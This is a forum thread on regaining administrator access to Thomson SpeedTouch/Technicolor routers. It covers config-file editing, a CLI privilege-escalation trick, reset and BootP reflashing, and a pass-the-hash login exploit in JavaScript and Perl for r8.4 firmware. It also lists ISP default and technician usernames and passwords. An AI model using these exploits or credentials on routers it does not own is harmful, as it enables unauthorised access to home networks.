Modem-Help

Dedicated help on Modems
 
HomeHome  CalendarCalendar  FAQFAQ  SearchSearch  MemberlistMemberlist  UsergroupsUsergroups  RegisterRegister  Log in  

Share | 
 

 Fixing Username & Password Problems

Go down 
AuthorMessage
Admin
Admin


Posts : 26
Join date : 2015-03-24

PostSubject: Fixing Username & Password Problems   Tue Mar 24 2015, 09:33

Router config via Web, FTP or Telnet access for ST/TG/TD routers all require 3 items:

  1. The gateway (router) IP address
  2. Username
  3. Password

Web (port 80) access to a router with a blank password will NOT demand a un/pw; FTP (port 21) or Telnet (port 23) will ALWAYS demand a un/pw, even if it is blank.

First the Access IP, then the username / password:

These are the default access IPs:
Quote :

  • http://dsldevice.lan/
  • http://speedtouch.lan/
  • http://192.168.1.254/ (mostly POTS lines)
  • http://10.0.0.138/ (mostly ISDN lines)

All of the above can be changed within the config; the defaults for ISP-supplied models are sometimes different, but not often.

All generic Firmware issued by Thomson since r5.3.0 has default usernames & passwords; the default user is:
Quote :

  • Username: Administrator
  • Password: (blank)(no-password)(just press the <Enter> key)


Update: this has changed on later firmware; see the 4th post for a fuller picture.

Note: the router OS is *nix, which means that both the username & password are cAsE sEnsItIvE.

The user 'Administrator' also has Administrator privileges (see 2nd post), which allows them to do anything & everything from the LAN-side of the router/Gateway. More on this later.

If a SpeedTouch Wizard is used to upgrade/downgrade the firmware, it will by default attempt to copy the router configuration to disk before transfer, then copy it back afterwards. This configuration sits within a text-file called "user.ini", located within the gateway in the '/dl/' directory (that is the only directory that you are allowed to access via FTP). More on this file later.

Problems come with ISP-customised firmware, which often means restricted firmware that stops the user from changing things. Or, of course, you may have an ST from eBay and do not know the password. First, be reassured that ALL cases that I've come across so far are perfectly standard Thomson firmware, but with customised config files that prevent the user from accessing the CLI (telnet), or FTP, or the parts of the router web-interface that allow those config files, etc. to be changed. That, after all, is what the privilege system was designed to do - allow ISPs to lock users out.

So, the issue for those unfortunates that have been lumbered with an ISP that prevents them from changing settings (read: control-freak) boils down to "how do I change the privilege of my username?". Or, more specifically, "how do I give my username an 'Administrator' privilege?". Or, even better, "how can I get a username with a 'SuperUser' privilege?" (I've not yet discovered anything that the 'root' can do that the 'SuperUser' cannot) (the 'SuperUser' can do everything that the 'Administrator' can do--which is everything--from both WAN and LAN sides of the router).

Getting a Username with a SuperUser Privilege:
To do this you need a un/pw with (at least) an Administrator privilege. I'll show how to do that later on for those that have been locked out, but what follows is necessary for later on.

First, find what usernames + privileges you have in the system.

The following is accurate for the ST585v6. Navigate through the router web pages, or try one of the web-addresses below to find out:
Quote :
Home > Toolbox > User Management


  • http://dsldevice.lan/cgi/b/users/ov/?ce=1&be=0&l0=2&l1=8
  • http://speedtouch.lan/cgi/b/users/ov/?ce=1&be=0&l0=2&l1=8
  • http://192.168.1.254/cgi/b/users/ov/?ce=1&be=0&l0=2&l1=8
  • http://10.0.0.138/cgi/b/users/ov/?ce=1&be=0&l0=2&l1=8


MSIE7 has problems with earlier firmware web-pages (use another browser).
(the first address is the default ST IP Address--yours may vary--whilst the second will only work if the router/gateway has the DHCP-server enabled, and your computer is correctly setup to receive LAN-addresses from it)

Pressing <Edit> on the following page will allow the Password to be reset:
Quote :
Home > Toolbox > User Management > Configure


  • http://dsldevice.lan/cgi/b/users/cfg/?ce=1&be=0&l0=2&l1=8
  • http://speedtouch.lan/cgi/b/users/cfg/?ce=1&be=0&l0=2&l1=8
  • http://192.168.1.254/cgi/b/users/cfg/?ce=1&be=0&l0=2&l1=8
  • http://10.0.0.138/cgi/b/users/cfg/?ce=1&be=0&l0=2&l1=8


"resetting" the password makes it the same as the username (remember: case-sensitive).


Next, let's find your router/gateway IP Address:
Quote :
Home > Broadband Connection > Internet Services


  • http://dsldevice.lan/cgi/b/is/?ce=1&be=0&l0=1&l1=1
  • http://speedtouch.lan/cgi/b/is/?ce=1&be=0&l0=1&l1=1
  • http://192.168.1.254/cgi/b/is/?ce=1&be=0&l0=1&l1=1
  • http://10.0.0.138/cgi/b/is/?ce=1&be=0&l0=1&l1=1


This is how to access it from the WAN side.


Save the ST configuration:
Quote :
Home > SpeedTouch > Configuration > Backup & Restore


  • http://dsldevice.lan/cgi/b/bandr/?ce=1&be=0&l0=0&l1=1&tid=BACKUP_RESTORE
  • http://speedtouch.lan/cgi/b/bandr/?ce=1&be=0&l0=0&l1=1&tid=BACKUP_RESTORE
  • http://192.168.1.254/cgi/b/bandr/?ce=1&be=0&l0=0&l1=1&tid=BACKUP_RESTORE
  • http://10.0.0.138/cgi/b/bandr/?ce=1&be=0&l0=0&l1=1&tid=BACKUP_RESTORE


This is the first thing to do after setting up the ST - keep the file somewhere safe.


Open the file ("user.ini") in a text-editor, and search for the section headed "[ mlpuser.ini ]". This is what the Thomson default settings look like:
Code:
[ mlpuser.ini ]
add name=Administrator password=_CYP_d41d8cd98f00b204e9800998ecf8427e role=Administrator hash2=a2e279ed6671666bed7738338c8c849f defuser=enabled
add name=admin password=_CYP_5f4dcc3b5aa765d61d8327deb882cf99 role=Administrator hash2=ff1ac4890f0eb9f4c9d6fbeb1046d3ad
add name=tech password=_CYP_7223e32709118090d359dfa6d6a4d96e role=TechnicalSupport hash2=ee7ec698ec300c9a058b47c402985131 defremadmin=enabled
...and this is the identical Administrator credentials in r8.2.7.7 firmware (585v7) with CYP2 values:
Code:
[ mlpuser.ini ]
add name=Administrator password=_CYP2_d78ddcd540c76991b548ebc39561cfaac32478b903ff10e0 role=Administrator hash2=b6dc35f8f2099445d5aff1f0db7cf265 defuser=enabled
add name=tech password=_CYP2_c230e53984b2aadedf0d7da6b0fb4e36c4c0224103b6b15e role=TechnicalSupport hash2=16a921c357a09b4a38d01c6e7a0bdd1d defremadmin=enabled
(note: this later firmware will still accept the older CYP entries)

The following will give you a different user:
Code:
[ mlpuser.ini ]
add name=su password=_CYP_0b180078d994cb2b5ed89d7ce8e7eea2 role=SuperUser hash2=4ff65b68acecea198d63378b4313e1a9
Quote :
Username: su
Password: su
Privilege: SuperUser
A 2nd method to do exactly the same thing:
Code:
[ mlpuser.ini ]
:user add name="su" password="su" role="SuperUser"

Bingo!

Save the file, and use the same page on the router that originally saved it to restore the new version. Restart the ST/TG, and you are sorted.


r8.4 & later Firmware Password Exploit: (added 10 Oct 2012)
r8.2 & earlier firmware use HTTP Basic authentication in web-config, employing .htm files, with a browser popup for login.

r8.4 & later firmware use the Kepler Project CGILua tool, with Lua pages (.lp files). It can also use the OSGi SDK framework (see r8.4 Release Notes for more info). This setup uses a Lua page for authentication & user switching. Extensive JavaScript is employed.

Thanks to superb research by mpontes, we know that the r8.4 web-config conducts all authentication/password-hashing/etc. at client side. That reveals all hashing secrets, and opens it up to a number of exploits, two of which are given here (note to fledgling web-programmers: clear evidence of what NOT to do in your own projects).

To make use of these exploits, you need knowledge of `hash2' for a root/SuperUser user, either direct from the user.ini or via filesystem dump. Here is an extract from a TG787 r8.4.Z.3 SIP (ISP: MEO) (the 160 byte SMB hashes have been omitted):
Code:
[ mlpuser.ini ]
add name=microuser password=_CYP2_9e1068578d922e177b722e2d9fb77ae2c796d5e998cf94ae role=RootUser hash2=afd39976a1973555831cdcb4309d4034 crypt=jn0Aq5ocIPzCI
(note that MEO has also customised the MLAP roles in this model; the `RootUser' role is equivalent to a `root' role)

The plain-text value for the `microuser' password is still not known for this model+firmware. This exploit renders such knowledge unnecessary. Only the value of hash2 ("afd39976a1973555831cdcb4309d4034") is required. This is how hash2 is derived (from the login.lp JavaScript):
Code:
var HA1 = MD5(user + ":" + realm + ":" + pwd);
...which for the MEO example above part-translates as:
Code:
MD5("microuser:Thomson Gateway:" + pwd)
(Sun May 11, 2014 update for Technicolor TG784n v3 from MEO ISP) (thanks ner0):
Code:
MD5("username:Technicolor Gateway:" + pwd)


First exploit example:
Quote :
Use the PERL script r8.4_exploit.sh. You will need:

  1. A PERL interpreter installed on your computer
  2. Change--as necessary--the value of the top variables in the script:

Code:
# new user is guru / guru (username / password)
# values below come from [ mlpuser.ini ] inside user.ini
# values shown are correct for MEO 8.4.Z.3 tg787
my $router_host = "http://192.168.1.254";       # replace if necessary
my $user = "microuser";                         # replace if necessary (must be root/SuperUser)
my $hash2 = "afd39976a1973555831cdcb4309d4034"; # value of $hash2 for root/SuperUser user
my $new_user = "guru";
my $new_role = "RootUser";                      # value of role for new root/SuperUser user

(after using the script you can then log in as the user `guru')


Second exploit example:
Quote :

  1. Using the browser `Chrome', go to the login page for your router
  2. Open `JavaScript Console' within `Developer Tools'
  3. Paste the following Javascript (replace the first two values) and hit Enter:
    Code:
    var user = "microuser";
    var hash2 = "afd39976a1973555831cdcb4309d4034";

    var HA2 = MD5("GET" + ":" + uri);
    document.getElementById("user").value = user;
    document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +
                           ":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
    document.authform.submit();

  4. Hopefully, you are now logged in as (in this case) the microuser user
    (now, add a new user at the same level)


Final note on the r8.4 & later exploits: some r8.4+ firmware is not later than r8.4. A good example is the TG782T: the r8.6.x firmware is earlier than r8.4, and uses the original web-authentication methods.


The next post will handle the situation for those that do not have a user that can currently do the operations above, and the 3rd post will be for those that do not know their username and/or password.
_________________
Alex Kemp
Back to top Go down
View user profile http://modem-help.board-directory.net
Admin
Admin


Posts : 26
Join date : 2015-03-24

PostSubject: Re: Fixing Username & Password Problems   Tue Mar 24 2015, 19:47

There will be some people reading the previous post and grinding their teeth, since their ISP will not let them access certain pages within the router/gateway. Even more annoying, the "Help" button shows all options, even ones that you cannot access!

The links in the first post will allow such folks to see some of these hidden pages, but they will find that they still cannot actually do anything on a hidden page. If this is your situation, this post may help. If not, you will need to turn to the final post.

This method relies on the Remote Assistance page:
Quote:
Home > Toolbox > Remote Assistance

http://192.168.1.254/cgi/b/ras/?ce=1&be=0&l0=2&l1=0
http://speedtouch.lan/cgi/b/ras/?ce=1&be=0&l0=2&l1=0

If MSIE7 keeps putting up the same un/pw box on login, even though the un & pw are correct, try Opera (I can also confirm Mozilla to be OK on r6.1.4.3+)


Under the default Thomson MLAP privilege system, a user with at least 'Administrator' privileges is required to be able to see and activate the above page. That can be changed by the ISP, and there have been many reports of users shut out by their ISP from 'normal' Administrator pages who have access to the 'Remote Assistance' page.

The idea of this page is that it can only be accessed from the WAN side of the router. The idea of that, of course, is that a techie from your ISP logs in and does some-stuff to fix your problems. My experiments show that there is nothing in the default setup to stop YOU from logging in yourself, and giving yourself an 'Administrator'-level new user.

A warning beforehand:
The default Thomson setup does not ask for a password when the page above is accessed; if you are asked for a pw, I cannot help.

Here again is the specific line from the [ mlpuser.ini ] section in the default Thomson-supplied 'user.ini' that enables use of Remote Assistance:
Code:
[ mlpuser.ini ]
...
add name=tech password=_CYP_7223e32709118090d359dfa6d6a4d96e role=TechnicalSupport hash2=ee7ec698ec300c9a058b47c402985131 defremadmin=enabled

...and here are the important parts from the router Remote Assistance page:
Quote:
URL: https://12.3.456.789:51003
Username: tech
Password: mxqd6d28

(I've changed the IP; the default pw changes each time; the connection-window closes after 20 minutes inactivity, or if the router is restarted)

Then:
Quote:
Copy the URL
Click the <Enable Remote Assistance> button
Bring up a new browser window
Paste in the URL and press <Return>
Accept the browser warnings about strange security certificates
Login to the router

The same browser rules about accessing the router from the WAN side (which this is) as from the LAN side apply.

If the ISP-setup prevents you from accessing the WAN side yourself, you can phone-a-friend to try for you, or try an analog dialup account (which will also work). Otherwise, refer to the lasp-gasp 3rd post method.

Now that you are logged in, add a new user:
Quote:
Home > Toolbox > User Management > New User

http://192.168.1.254/cgi/b/users/cfg/usraccaddrem/?ce=1&be=0&l0=2&l1=8&tid=ADD_USER
http://speedtouch.lan/cgi/b/users/cfg/usraccaddrem/?ce=1&be=0&l0=2&l1=8&tid=ADD_USER

(A TechnicalSupport-level user can add an Administrator-level user, and that is what you want; the password will be the same as the username; remember: case-sensitive)

Afterwards, restart the router, then login under your spiffy new username. Do not forget to gloat, and put two fingers up (or just one if you are American) to your ISP. Also, remember to SAVE YOUR NEW USER.INI! (see first post).

Another method:
If your firmware is r7.4.2 or later, and you can access Telnet, there is another method which may be easier.

This makes use of a privilege-escalation boo-boo within the CLI scripting engine. This is the step-by-step:
Login in to Telnet on the router
Issue the following three commands:
Code:
:script add name addroot command "user add name guru password guru role root descr ROOT"
:script run name addroot pars ""
:saveall
Now use the guru/guru combo to login - all services should be accessible.


Yet another method:
This is the one advised by Thomson (see MLAP Guide r6.2, p63); you need to be able to access Telnet. From the config guide:
Quote:
The default user configuration is implemented in such a way that it does not allow for users with privileges higher than Administrator to be created via the CLI command.

This is how to escape from that bind:
Login in to Telnet on the router
Issue the following command:
Code:
:user flush
Logout.
(at this point, neither un nor pw are required to acess either web config or Telnet. From the config pdf):
Quote:
So the next user who logs in will log in as root and, as a result, have all the rights on the Thomson Gateway.
Login to Telnet
(no need to enter username nor password)
Issue the following commands:
Code:
:user add name="my-user-name" password="my-password" role=SuperUser
:saveall
All services should now be accessible with that login.


The last post will be for those that cannot access the router at all (because it rejects the password), or for whom the method(s) above have simply not worked.
_________________
Alex Kemp


Last edited by Admin on Tue Mar 24 2015, 19:51; edited 1 time in total
Back to top Go down
View user profile http://modem-help.board-directory.net
Admin
Admin


Posts : 26
Join date : 2015-03-24

PostSubject: Re: Fixing Username & Password Problems   Tue Mar 24 2015, 19:50

This post is for all those people where none of the methods in the first two posts will work.

Be Warned! All the methods outlined below will wipe the current config within your router/gateway. They start out easy, and progressively get a little more difficult, but each one will mean resetting-up the router afterwards to be able to connect with your ISP (plus Wireless, etc. etc.). If you are going to do this, make sure NOW that you have ALL the info that you will later need.


Advice Before Changes:

All methods below reset the router to defaults. One of the main issues is to be able to re-connect to the gateway afterwards, since your ISP may have changed the defaults. Another--really irritating--issue is that Thomson themselves changed the defaults at r5.3.0 (main features also back-ported into v4 firmware at r4.3.2.6). The advised setup therefore changes according to the model of ST that you have, and the Firmware that it is about to run. Tech Support agents always advise a fixed IP on the computer, even though an active DHCP-server is standard on all Gateways (using a fixed IP removes yet another layer of uncertainty):
Quote:
Advised computer network setup before any changes:

r5.3+/r4.3+:
Fixed computer IP (do not use DHCP server on Gateway)
Computer IP: 192.168.1.64
Subnet Mask: 255.255.255.0
Default Gateway IP: 192.168.1.254

Earlier Firmware:
Fixed computer IP (do not use DHCP server on Gateway)
Computer IP: 10.0.0.1
Subnet Mask: 255.0.0.0
Default Gateway IP: 10.0.0.138
General setup advice before Firmware transfer:
Unplug the DSL line.
Disable/turn off ALL firewalls.
Disable/turn off ALL anti-virus.
Use Ethernet connection only.
On Switch models, only use Port 1.
Disconnect any USB connection to Gateway.

Current network info is most easily obtained under windows using the "ipconfig" command at a command prompt. Here is an example on my ST585v6 at home:
Code:
ipconfig /all

Windows IP Configuration

       Host Name . . . . . . . . . . . . : david
       Primary Dns Suffix  . . . . . . . :
       Node Type . . . . . . . . . . . . : Mixed
       IP Routing Enabled. . . . . . . . : No
       WINS Proxy Enabled. . . . . . . . : No
       DNS Suffix Search List. . . . . . : lan

Ethernet adapter Local Area Connection:

       Connection-specific DNS Suffix  . : lan
       Description . . . . . . . . . . . : Intel(R) 82562V 10/100 Network Connection
       Physical Address. . . . . . . . . : 00-19-D1-47-85-BE
       Dhcp Enabled. . . . . . . . . . . : Yes
       Autoconfiguration Enabled . . . . : Yes
       IP Address. . . . . . . . . . . . : 192.168.1.64
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 192.168.1.254
       DHCP Server . . . . . . . . . . . : 192.168.1.254
       DNS Servers . . . . . . . . . . . : 192.168.1.254
       Lease Obtained. . . . . . . . . . : 03 January 2008 19:30:04
       Lease Expires . . . . . . . . . . : 04 January 2008 19:30:04


Think of your SpeedTouch router/gateway as a specialised micro computer. The OS, program & config files are stored in Flash-ROM, and RAM becomes a working file-system on bootup. Modern r5.3+/r4.3+ routers have a single partition (earlier firmware was dual-partition). Single partition devices have a higher likelihood of corruption in use than dual-partition models, so if a later model gets stopped (including turned off or unplugged) during the boot-sequence, the next time it will start in "BootP"-mode. That means that it is waiting for a BootP-server to respond, and the router is ready to load new firmware. Loading new firmware will completely wipe all of the existing ISP setup and--assuming that you load generic Thomson firmware--will give default usernames & passwords (see top of the very first post). If the methods offered in the first two posts have failed, that is exactly what you want.

The ST Wizards for r5.3+/r4.3+ firmware are BootP- and tFTP-servers (Wizards for earlier firmware are not); the latest version at the time of writing is r4.4.21, and can be used with all r5.3+/r4.3+ firmware upto the latest r7 releases. Have a look under the 'Firmare' directory of your router in the Alcatel downloads directory. The wizards are either pre-packed with firmware, or empty (you can add your choice of firmware in either case). You will be asked to browse to select the firmware for upload during use; pre-packed Wizards have defaults within their setup files that make it easier to find the firmware file. If, for any reason, you do not want to/cannot use the Thomson Wizards, there are some generic BootP & tFTP servers here (pre-r5.3 firmware requires use of this 3rd-party server for the BootP method).

Some firmware releases come in both "file-system" & "bootp" varieties, whilst others only offer the bootp variant. From the previous paragraph it is obvious that what you want is the 'bootp' version. My experience with the Wizards & 585v6 bootp-firmware suggests that it also contains a copy of the file-system software. There is a topic in these forums with all the known firmware releases for every SpeedTouch Router or Gateway; each release is also linked to the download directory that contains it, which should make life easier.

Wizards for pre r5.3-firmware will upload it without regard to any device username/passwords. Wizards for r5.3+/r4.3+ password-protected routers insist on the password being entered before upgrade/downgrading firmware, which explains why the default username has no password.



Three Methods to Wipe the Current Config:

Finally, after that mass of advice, we can get to the methods on how to do it. As best as I can tell, with r5.3+/r4.3+ models Thomson uses identical base-firmware, and all ISP localisations are achieved via configuration changes, including default usernames & passwords. The aim, then, is simply to wipe out the current device configuration. There are 3 ways that this can be achieved, each of increasing difficulty. The ISP config can prevent access to the first method, but cannot stop the last two:


1 Reset the configuration from the Embedded Web-Pages:
Navigate to the Router reset-page, and click "Yes, reset my SpeedTouch" (the following are accurate for the ST585v6 with default r6.1.4.3 firmware):
Quote:
Software Reset:
Home > SpeedTouch > Configuration > Reset

http://192.168.1.254/cgi/b/info/reset/?ce=1&be=0&l0=0&l1=1&tid=RESET
http://speedtouch.lan/cgi/b/info/reset/?ce=1&be=0&l0=0&l1=1&tid=RESET

When complete, you will need to re-setup the router. It contains an "Easy Setup" Wizard to help you do this:

Home > SpeedTouch (click on 'Set Up' within "Pick a task...")

http://192.168.1.254/cgi/b/ST/?ce=1&be=0&l0=0&l1=-1
http://speedtouch.lan/cgi/b/ST/?ce=1&be=0&l0=0&l1=-1


2 Reset the configuration Mechanically:
Thomson refers to the above method as a "Software Reset", whilst this is referred to as a "Hardware Reset" - you can read about both methods within the r5.4 User Guide (p103). Both Software- and Hardware-Resets achieve the same end-result (wiping the current config & restoring to factory defaults). There are 2 varieties of hardware-reset:
Routers with a 'reset' hole at the rear of the device (like mine - see the previous link), usually tucked amongst all the connection sockets.
Routers without a 'reset' hole - check your model User-Guide for the precise method.

Quote:
Hardware Reset:
Devices with a 'reset' hole (see ST-585v6 r5.4 User Guide p103):
Make sure the SpeedTouch is turned on.
Use a pen or an unfolded paperclip to push the recessed reset button on the back panel. Push it until the power LED lights red - this will take about 7 seconds.
Release the reset button.
The SpeedTouch restarts in default configuration.
Devices without a 'reset' hole (check your model for the method; an example is ST510/530v4 r4.3:
Make sure the SpeedTouch is powered on.
Power off the SpeedTouch by pressing the power button until all LEDs turn off.
Press the power button once again (shortly).
As soon as the Power/System LED is flashing green, press the power button once more (shortly).
The Power/System LED stops flashing to become solid green. After six seconds, it starts flashing green again. Press the power button once more (shortly).
All LEDs flash green once.
The SpeedTouch reboots and will come online with factory default settings.

When complete, you will need to re-setup the router, exactly as with the 'Software Reset' above.


3 Use BootP to load default Firmware:
This has been devised by Thomson as a last-gasp method to get a device operational again that is otherwise utterly FOOBAR-ed. If you consider that your ST is (actually or effectively) totally FOOBAR, and none of the steps above work, this is the one for you.

In Thomson's words, from the r4.2.7 ST510/530v4 Setup and User’s Guide:
Quote:
'BootP' is "a standard mechanism used for booting diskless stations".
You will therefore understand that the BootP-state for the Gateway occurs before transfer of control to the on-board firmware, and that neatly escapes from the catch-22 of needing to know the password with r5.3+/r4.3+ devices before you can upload the firmware.

The basic procedure is as follows:
Have an assembly of:
combo BootP+tFTP-server
firmware
...prepared ready on a computer attached by ethernet to the router/gateway.
Put the router into BootP mode.
Watch the firmware transfer across the wire, and the router restart.
(sounds easy, huh?)

As with some of the other methods, this one varies according to model & firmware:

With pre-r5.3/r4.3 models:
A 3rd-party BootP & tFTP server is needed, since the Alcatel/Thomson Wizard will not work.
The router MAC address is needed (for the bootp-server) (update: not with Jounin, see following).
The method to get the gateway into BootP-mode differs from later firmware (again, check the User-Manual for your model for the precise method).

With r5.3+/r4.3+ models:
3rd-party BootP & tFTP servers will work if the Thomson Wizard fails.
The Wizard is reliably reported to be a BootP-server.
The method to get the gateway into BootP-mode differs to earlier firmware, and is not documented by Thomson anywhere (except indirectly).

Revs Per Min reports that the Jounin tFTP server does not need a MAC address. Here is his report on how to upgrade a bricked ST536v5 using Jounin:
Quote:
Download a tftp server. I used tftpd32.exe from tftpd32.jounin.net
Free and very neat. It has a bootp server in it. No install just start the exe.
I used the v3 beta but earlier version should be ok.

Plug in the modem no phone connection. Set a static ip on the pc ethernet of 10.0.0.10.
Now start the tftpd32 and go to the DHCP server tab.

Start address 10.0.0.138
pool size 1
bootfile zztxaa5334.bin (put the firmware file in same directory as the tftpd32 and use whatever one you have.)
wins blank
default router blank
mask 255.0.0.0

Then click the save.
Check the server interface is set to 10.0.0.10.
Go to the Event viewer. Start the modem again in bootp mode.
You should see the requests for ip, the ip passed to the modem and immediately start to download the firmware into the modem.

DO NOT SHUT OFF THE MODEM.
During the upload the power light will go to solid red and the ethernet flash. Once the transfer is made it will flash red to green. You don't need to do anything. The speedtouch will check the file and load it into flash and reboot itself. The modem should just come up with green power light.
Then change your ethernet back to auto.
Go through the gui and fill out the setup wizard.

This was the event viewer log.
Rcvd BootP Msg for IP 0.0.0.0, Mac 00:0E:50:CA:55:C2 [26/05 17:28:15.001]
DHCP: proposed address 10.0.0.138 [26/05 17:28:15.011]
Rcvd BootP Msg for IP 0.0.0.0, Mac 00:0E:50:CA:55:C2 [26/05 17:28:15.992]
DHCP: proposed address 10.0.0.138 [26/05 17:28:16.002]
Read request for file <zztxaa540e.bin>. Mode octet [26/05 17:28:16.233]
Using local port 1143 [26/05 17:28:16.233]
Rcvd DHCP Rqst Msg for IP 0.0.0.0, Mac 00:11:D8:BA:DB:D5 [26/05 17:28:18.736]
<zztxaa540e.bin>: sent 4100 blks, 2098763 bytes in 25 s. 0 blk resent [26/05 17:28:41.629]

If you need the MAC address:
Quote:
One obvious place to look is the label on the ST (usually fixed to the base of the device); on my 585v6 it is at the top LHS, underneath the 2nd bar-code.

Another place to confirm it is from the embedded web-pages:
Pre-r5.3/r4.3 models (the example comes from the r4.2.7 ST510/530v4 Setup and User’s Guide p47):

Home > System tab (Physical Address)

http://10.0.0.138/

The Physical Address shown is described by Thomson as "The unique Medium Access Control (MAC) address of your SpeedTouch" (I thought that it was "Media Access Control").

r5.3+/r4.3+ models: It cannot be found on the web-pages (humph).

The MAC address is one of the environment variables (_MACADDR) & can be found with the CLI command "env list".

To put the Router/Gateway into BootP mode:
Quote:
Varies by Firmware (possibly by model - check your User Guide):
Pre-r5.3/r4.3 models with reset (the example comes from the r5.2.7 ST510/530/516/536/546v5 Setup and User’s Guide p73, and is largely mirrored by a copy of a post from a NZ SpeedTouch Rep in the Whirlpool Forums):
Start with the SpeedTouch switched off.
Use a pencil to press and hold the recessed reset button on the SpeedTouch rear panel.
While holding the reset button, push in the power button to switch on the SpeedTouch. You will notice that the power LED is solid red.
Keep holding the reset button for at least twelve seconds until the power LED turns solid green.
Release the reset button as soon as the power LED turned solid green. This indicates that the SpeedTouch entered BOOTP mode and is sending BOOTP requests.

Pre-r5.3/r4.3 models without reset (the example comes from the r4.2.7 ST510/530v4 Setup and User’s Guide p68):
Start with the SpeedTouch switched off.
Press the SpeedTouch power button and hold it until the Power/System LED flashes amber (approximately six seconds). This indicates that the SpeedTouch entered BOOTP mode and is sending BOOTP requests.

r5.3+/r4.3+ models: Not directly documented (humph).

The r6.2.F Release Notes contain a clue (p14):
Quote:
If the ST is shut down during boot, it gets stuck in BOOTP mode. This is actually not a restriction as such, but the normal result of a feature. When the ST changed from dual to single partition routers, a backup plan was necessary in case the active (and only) build would get corrupted, or in case the modem couldn't start. The BootP mechanism was implemented to recover from such a situation. This mode allows the routers to be always recoverable, by having the router entering BootP mode. The router then expects a BootP server, with a TFTP server to upload a new build.

To succeed, the router must be able to detect when the booting has failed. If the modem detects that it did not finish its boot sequence completely, it will enter BootP mode. A side-effect of this mechanism is that, if you unplug (or turn off in any way) a router during it's boot sequence, it will start in BootP the next time.

The following is pure theory; at this moment I cannot persuade my ST585v6 to do it!:
Quote:
r5.3+/r4.3+ models:
Start with the SpeedTouch switched off.
Press the SpeedTouch power button.
Press and switch OFF the router whilst the Power/System LED still shows red (or amber, the User Guides vary).
On next startup the Power/System LED will display solid red (or flashing amber, the User Guides vary). This indicates that the SpeedTouch entered BOOTP mode and is sending BOOTP requests.
Now run the SpeedTouch firmware upgrade wizard.

Sat update: this is how to put a ST-585v6 into BootP mode:
Quote:
Start with the SpeedTouch switched off.
Use the end of a paperclip to press and hold the recessed reset button on the SpeedTouch rear panel.
While holding the reset button, push in the power button to switch on the SpeedTouch. You will notice that the power LED is solid red.
Keep holding the reset button for at least ?? seconds until the power LED turns solid orange.
Now release the reset button. The router is in BootP mode and is sending BootP requests.

This was the sequence with Jounin to send ZZQIAA6.2F5.bli to the router:
Quote:
(Before switching the 585v6 into BootP mode):
Put all 3 files from Jounin into it's own directory, including 'tftpd32.exe' (no installation required) + the bootp-firmware-file.
Setup the computer for a static IP as top of this post (Properties on TCP/IP within Network Adapter Properties).
Start the tftpd32 and go to the DHCP server tab:
IP Pool starting address: 192.168.1.254
Size of pool: 1
Boot File: ZZQIAA6.2F5.bli
Mask: 255.255.255.0
Everything else blank.
Click 'Save'.
Make sure "Server interfaces" says '192.168.1.64'.
Close Jounin (when my 585 started BootP-mode it threw an exception on the computer, and I had to restart it)
(Dec 2008 update: the latest v3.28 is trouble-free, so there is no need to shutdown/restart Jounin).



(do the sequence as above to start BootP-mode with the router)
Restart Jounin.
Watch the file transfer.
Router restarts; power-LED stays orange for a long time (do NOT switch it off now!!!)
Router restarts again, with a normal sequence this time.
Router has factory defaults & will require upload of previous-saved config file, or use of embedded Wizard.

2008-12-11 edit: added Jounin image + news on v3.28 update
_________________
Alex Kemp


Last edited by Admin on Tue Mar 24 2015, 19:52; edited 1 time in total
Back to top Go down
View user profile http://modem-help.board-directory.net
Admin
Admin


Posts : 26
Join date : 2015-03-24

PostSubject: Re: Fixing Username & Password Problems   Tue Mar 24 2015, 19:51

These are the Username/Password pairs for ISP-supplied routers, with MLAP-level where known, as released into the public domain:

Quote:
Generic firmware:
r8+ TG models, Thomson default:
Username: Administrator
Password: either Modem Access Code or Serial Number (printed on the product label, usually fixed to the base)
MLAP: Administrator

r5.3+/r4.3+ models, Thomson default:
Username: Administrator
Password: (blank) (no password)
MLAP: Administrator

Pre-r5.3/r4.3 models, Alcatel/Thomson default:
Username: Administrator (does not apply to early models)
Password: (blank) (no password)
MLAP: (does not apply)

Quote:
BT, UK
BT Home Hub (aka ST-7G):
Username: admin
Password: admin
MLAP: Administrator

Activation codes for Setup Wizard:
522P-22P4-A222-22AT-F24N, or
5225-2374-WG62-22AS-BJ7P
Notes: default MLAP permissions have changed in later firmware: r6.2.6.C disables telnet access to the hub (post #608).

Quote:
Claro (Puerto Rico)
TG582n
TG782
...and others:
Username: (Modem Serial Number) (see sticker on modem bottom/side)
Password: (Modem Serial Number)
MLAP: SuperUser
Extra: web access for config is via http://10.0.0.138/

Quote:
CYTA-Net, Cyprus; UK
All models:
Username: cytadsl
Password: cytaspeed
MLAP: Administrator

All models (probably; TG585v7 confirmed):
Username: cytauser
Password: (blank) (no password)
MLAP: LAN_Admin

All models (probably; TG782 confirmed):
Username: cytahellas
Password: d5l_cyt@_h3l1@$
MLAP: (unknown; possibly SuperUser)

Quote:
Forthnet S.A, Greece
TG784:
Username: dsath
Password: f@0r!T3D
MLAP: root (also remote admin)

Username: user
Password: (empty, no password)
MLAP: PowerUser

Quote:
KPN, Netherlands
TG789vn:
Username: kpn
Password: "" (empty, no password)
MLAP: KPNUser
Username: TGupgrade789KPN
Password: _CYP_37a5272e259d03f1257f77c21bdabc5d (needs decrypting)
MLAP: upgrade

Quote:
Lattelecom, Latvia
TG789vn v3 r8.4.5.F:
Username: Tdvdran
Password: dsls
MLAP: SuperUser

Username: LattelecomUser
Password: user
MLAP: LTUser (User with LAN access to some parts of webGUI)

Username: Lattelecom
Password: (not known)
MLAP: Administrator

Quote:
Maxis FTTH, Malaysia
TG799vn:
Username: Administrator
Password: (<access key>) (on router label)
MLAP: Administrator
extra: To enable public address (port forward):
Change web config login to Administrator as above
change dialin username to xxx@public.maxis.com.my from xxx@home.maxis.com.my
dial-in password is <account number> + 1 (eg a/c num=12345; pw=123451)

Quote:
Meine Medien, Austria
TG585v7 r8.2.6.5:
Username: (blank) (no password)
Password: (blank) (no password)
MLAP: Endkunde

Username: Telek0m
Password: Austria&Eur0
MLAP: Techn_Kundendienst

Username: mquadrat
Password: echecker
MLAP: Konfigurator

Quote:
Maxis FTTH, Malaysia
TG799vn:
Username: Administrator
Password: (<access key>) (on router label)
MLAP: Administrator
extra: To enable public address (port forward):
Change web config login to Administrator as above
change dialin username to xxx@public.maxis.com.my from xxx@home.maxis.com.my
dial-in password is <account number> + 1 (eg a/c num=12345; pw=123451)

Quote:
MEO IPTV, Portugal
TG784:
